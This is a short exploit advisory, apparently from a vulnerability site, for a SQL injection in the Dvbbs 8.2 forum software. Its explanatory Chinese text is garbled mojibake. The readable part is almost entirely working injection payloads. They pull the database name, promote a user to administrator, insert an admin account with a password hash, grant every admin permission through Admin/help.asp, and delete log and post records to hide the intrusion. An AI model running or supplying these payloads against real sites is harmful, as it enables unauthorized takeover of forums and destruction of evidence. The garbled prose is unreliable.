Dvbbs 8.2 SQL injection 0day(2009-12-31)

Է:
[www.sebug.net]
վṩ()ܴй,ȫоѧ֮,Ը!ӣΪsql䣬Ȼۡ0Ϊ, 1Ϊ֧, 2Ϊ С
ʱsql䱻ִ
a'','''',1,''akai'',''2008-2-4'','''',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username=''akai''--

ƴǰ̨ͺ̨Աa'','''',1,''akai'',''2008-2-4'','''',2);update dv_user set UserGroupID=1 where username=''akai'';insert into dv_admin(Username,Password,Flag,Adduser)values(''akai'',''965eb72c92a549dd'','',4,'',''akai'')--

ƴ̨,ͨעٻȡȫȨޣhttp://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag=''1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45''/**/where/**/username=''akai''--

ƴݿ¼http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username=''akai'';delete/**/from/**/dv_topic/**/where/**/PostUsername=''akai'';delete/**/from/**/Dv_Appraise/**/where/**/UserName=''akai''--
